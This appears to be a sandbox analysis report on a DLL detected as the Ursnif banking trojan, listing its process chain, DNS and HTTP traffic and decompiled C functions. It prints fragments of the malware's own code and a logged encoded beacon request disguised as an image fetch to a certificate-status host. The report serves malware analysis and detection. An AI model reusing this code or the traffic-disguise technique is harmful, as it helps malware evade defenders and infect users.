Jan 21, 2021 08:15:16.081836939 CET	192.168.2.4	8.8.8.8	0xa6f	Standard query (0)	ocsp.sca1b.amazontrust.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 21, 2021 08:14:26.546389103 CET	8.8.8.8	192.168.2.4	0x16a3	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:28.915817022 CET	8.8.8.8	192.168.2.4	0x3b09	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:29.385031939 CET	8.8.8.8	192.168.2.4	0xdd9	No error (0)	contextual.media.net		104.76.200.23	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:30.503048897 CET	8.8.8.8	192.168.2.4	0x69cf	No error (0)	lg3.media.net		104.76.200.23	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:31.647097111 CET	8.8.8.8	192.168.2.4	0x6fd4	No error (0)	hblg.media.net		104.76.200.23	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:32.367578983 CET	8.8.8.8	192.168.2.4	0x3852	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:32.782668114 CET	8.8.8.8	192.168.2.4	0x1ee1	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:32.782668114 CET	8.8.8.8	192.168.2.4	0x1ee1	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:33.940999985 CET	8.8.8.8	192.168.2.4	0xe5b4	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2021 08:14:33.940999985 CET	8.8.8.8	192.168.2.4	0xe5b4	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:33.940999985 CET	8.8.8.8	192.168.2.4	0xe5b4	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:33.940999985 CET	8.8.8.8	192.168.2.4	0xe5b4	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jan 21, 2021 08:14:33.940999985 CET	8.8.8.8	192.168.2.4	0xe5b4	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jan 21, 2021 08:15:16.141247034 CET	8.8.8.8	192.168.2.4	0xa6f	No error (0)	ocsp.sca1b.amazontrust.com		143.204.214.141	A (IP address)	IN (0x0001)
Jan 21, 2021 08:15:16.141247034 CET	8.8.8.8	192.168.2.4	0xa6f	No error (0)	ocsp.sca1b.amazontrust.com		143.204.214.142	A (IP address)	IN (0x0001)
Jan 21, 2021 08:15:16.141247034 CET	8.8.8.8	192.168.2.4	0xa6f	No error (0)	ocsp.sca1b.amazontrust.com		143.204.214.74	A (IP address)	IN (0x0001)
Jan 21, 2021 08:15:16.141247034 CET	8.8.8.8	192.168.2.4	0xa6f	No error (0)	ocsp.sca1b.amazontrust.com		143.204.214.169	A (IP address)	IN (0x0001)
Jan 21, 2021 08:16:06.215176105 CET	8.8.8.8	192.168.2.4	0x99a2	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49788	143.204.214.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2021 08:15:16.193494081 CET	3528	OUT	GET /images/UX6NBxejGKuiww/O5lNkgT6UNtIOi_2F9bva/Qprmk34fIbO879qt/MdtrogqLmF_2Fqf/_2FF2F05EKst9Z1EEw/f4caZYYsT/SAZrEW2lvj_2BEojoTxU/tDJE5vtOctKZ_2FKqji/N5plaj5Qq3lxm6IFqAOkT_/2FkRoPIQCjapM/McWFMQds/m87yGEYxK6DYnqXLcn6Sf84/1Yi_2FiH.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ocsp.sca1b.amazontrust.com Connection: Keep-Alive
Jan 21, 2021 08:15:16.278783083 CET	3530	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Content-Length: 5 Connection: keep-alive Accept-Ranges: bytes Cache-Control: public, max-age=300 Date: Thu, 21 Jan 2021 07:15:16 GMT ETag: "5f457bf9-5" Last-Modified: Tue, 25 Aug 2020 21:00:41 GMT Server: nginx X-Cache: Miss from cloudfront Via: 1.1 f960fa0538fdb326fc338e984fa7ece9.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA53-C1 X-Amz-Cf-Id: fNCye2zPXAspQiJgcNkXrUEP82Ppmq9qCjNs0gdJP1wS0Pzg6UxaDw== Data Raw: 30 03 0a 01 06 Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 21, 2021 08:14:34.042810917 CET	151.101.1.44	443	192.168.2.4	49751	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.042810917 CET	151.101.1.44	443	192.168.2.4	49751	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.044116974 CET	151.101.1.44	443	192.168.2.4	49755	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.044116974 CET	151.101.1.44	443	192.168.2.4	49755	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.045207977 CET	151.101.1.44	443	192.168.2.4	49754	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.045207977 CET	151.101.1.44	443	192.168.2.4	49754	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.045911074 CET	151.101.1.44	443	192.168.2.4	49750	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.045911074 CET	151.101.1.44	443	192.168.2.4	49750	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.058056116 CET	151.101.1.44	443	192.168.2.4	49752	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.058056116 CET	151.101.1.44	443	192.168.2.4	49752	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.062479019 CET	151.101.1.44	443	192.168.2.4	49753	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 21, 2021 08:14:34.062479019 CET	151.101.1.44	443	192.168.2.4	49753	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6932 Parent PID: 6004

General

Start time:	08:14:23
Start date:	21/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\f0t0s.dll'
Imagebase:	0xce0000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 6940 Parent PID: 6932

General

Start time:	08:14:23
Start date:	21/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\f0t0s.dll
Imagebase:	0xbd0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6948 Parent PID: 6932

General

Start time:	08:14:23
Start date:	21/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6972 Parent PID: 6948

General

Start time:	08:14:23
Start date:	21/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6d5720000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 7016 Parent PID: 6972

General

Start time:	08:14:24
Start date:	21/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2
Imagebase:	0x10b0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6288 Parent PID: 6972

General

Start time:	08:14:37
Start date:	21/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17428 /prefetch:2
Imagebase:	0x10b0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4972 Parent PID: 6972

General

Start time:	08:15:14
Start date:	21/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82960 /prefetch:2
Imagebase:	0x10b0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 6940 Parent PID: 6932 regsvr32.exeCOMMON

Executed Functions

Function 00BA523C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00BA523C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xbad2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xbad238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xbad2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xbad238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xbad238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xbad2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xbad2a4; // 0x44fa5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xbae7f2; // 0x73797325
				_t83 = E00BA27B6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xbad238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xbad2a4; // 0x44fa5a8
				_t16 = _t93 + 0xbae813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00ba5245
0x00ba524b
0x00ba524d
0x00ba5267
0x00ba5269
0x00ba526e
0x00ba54e3
0x00ba54ea
0x00ba54ea
0x00ba5274
0x00ba5289
0x00ba528b
0x00ba528d
0x00ba5292
0x00ba54d3
0x00ba54dd
0x00000000
0x00ba54dd
0x00ba5298
0x00ba52a3
0x00ba52a8
0x00ba52ad
0x00ba52b0
0x00ba52b7
0x00ba52bc
0x00ba52c1
0x00ba54c3
0x00ba54cd
0x00000000
0x00ba54cd
0x00ba52d7
0x00ba52db
0x00ba52de
0x00ba52e1
0x00ba52e7
0x00ba52ec
0x00ba52f5
0x00ba52fb
0x00ba5305
0x00ba530c
0x00ba530c
0x00ba531e
0x00ba5329
0x00ba5337
0x00ba533c
0x00ba5341
0x00ba5344
0x00ba5349
0x00ba5353
0x00ba5356
0x00ba5359
0x00ba536f
0x00ba5371
0x00ba5376
0x00ba54c1
0x00000000
0x00ba54c1
0x00ba538d
0x00ba53de
0x00ba53a1
0x00ba53a9
0x00ba53ae
0x00ba53bc
0x00ba53c5
0x00ba53ce
0x00ba53ce
0x00ba53dc
0x00ba53dc
0x00ba53e2
0x00ba53e6
0x00ba53e6
0x00ba53ec
0x00000000
0x00000000
0x00ba53ee
0x00ba53f4
0x00ba549b
0x00ba549e
0x00ba54ab
0x00ba54ab
0x00ba54af
0x00000000
0x00000000
0x00ba54a4
0x00ba54a8
0x00ba54a8
0x00ba54aa
0x00ba54aa
0x00ba54b4
0x00ba54bb
0x00ba54bd
0x00000000
0x00ba54bd
0x00ba53fa
0x00ba53fc
0x00ba53fc
0x00ba540f
0x00ba5415
0x00ba5420
0x00ba5422
0x00ba5426
0x00ba5428
0x00ba5428
0x00ba542d
0x00ba542f
0x00ba542f
0x00ba542d
0x00ba5434
0x00ba5438
0x00ba5438
0x00ba5448
0x00ba544d
0x00ba5450
0x00ba5450
0x00ba5453
0x00ba545d
0x00ba5465
0x00ba546a
0x00ba5478
0x00ba5478
0x00ba548c
0x00ba5490
0x00ba5490

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BA5267
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BA5289
memset.NTDLL ref: 00BA52A3

Part of subcall function 00BA27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BA5073,63699BCE,00BA52BC,73797325), ref: 00BA27C7
Part of subcall function 00BA27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BA27E1

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BA52E1
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BA52F5
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BA530C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BA5318
lstrcat.KERNEL32(?,642E2A5C), ref: 00BA5359
FindFirstFileA.KERNELBASE(?,?), ref: 00BA536F
CompareFileTime.KERNEL32(?,?), ref: 00BA538D
FindNextFileA.KERNELBASE(00BA568F,?), ref: 00BA53A1
FindClose.KERNEL32(00BA568F), ref: 00BA53AE
FindFirstFileA.KERNEL32(?,?), ref: 00BA53BA
CompareFileTime.KERNEL32(?,?), ref: 00BA53DC
StrChrA.SHLWAPI(?,0000002E), ref: 00BA540F
memcpy.NTDLL(00000000,?,00000000), ref: 00BA5448
FindNextFileA.KERNELBASE(00BA568F,?), ref: 00BA545D
FindClose.KERNEL32(00BA568F), ref: 00BA546A
FindFirstFileA.KERNEL32(?,?), ref: 00BA5476
CompareFileTime.KERNEL32(?,?), ref: 00BA5486
FindClose.KERNELBASE(00BA568F), ref: 00BA54BB
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00BA54CD
HeapFree.KERNEL32(00000000,?), ref: 00BA54DD

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: 7dc971f3a8820514f690494a2c8ff796db9a5ff01adf2a465846c3c0505688e9
Instruction ID: 9a0dc04aab7ebe01020d9ff1b66a5011859955d890ae9952d54ff362d2d27590
Opcode Fuzzy Hash: 7dc971f3a8820514f690494a2c8ff796db9a5ff01adf2a465846c3c0505688e9
Instruction Fuzzy Hash: 37813C71900219EFDB219FA5DC85AEEBBF9FF4A301F1045A6E505E7260DB709A84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00381266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00381266(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00382070();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x384144;
				_push(_t15 + 0x38505e);
				_push(_t15 + 0x385054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0038206A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x384148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00381266
0x0038126f
0x00381273
0x00381279
0x0038127e
0x00381283
0x00381286
0x00381289
0x0038128e
0x0038128f
0x00381292
0x0038129d
0x003812a4
0x003812a8
0x003812aa
0x003812ab
0x003812ae
0x003812b3
0x003812bd
0x003812bf
0x003812bf
0x003812d3
0x003812d9
0x003812dd
0x0038132d
0x003812df
0x003812e8
0x003812fe
0x00381306
0x00381318
0x0038131c
0x00000000
0x00000000
0x00381308
0x0038130b
0x00381310
0x00381312
0x00381312
0x003812f3
0x003812f5
0x0038131e
0x0038131f
0x0038131f
0x003812e8
0x00381335

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00381273
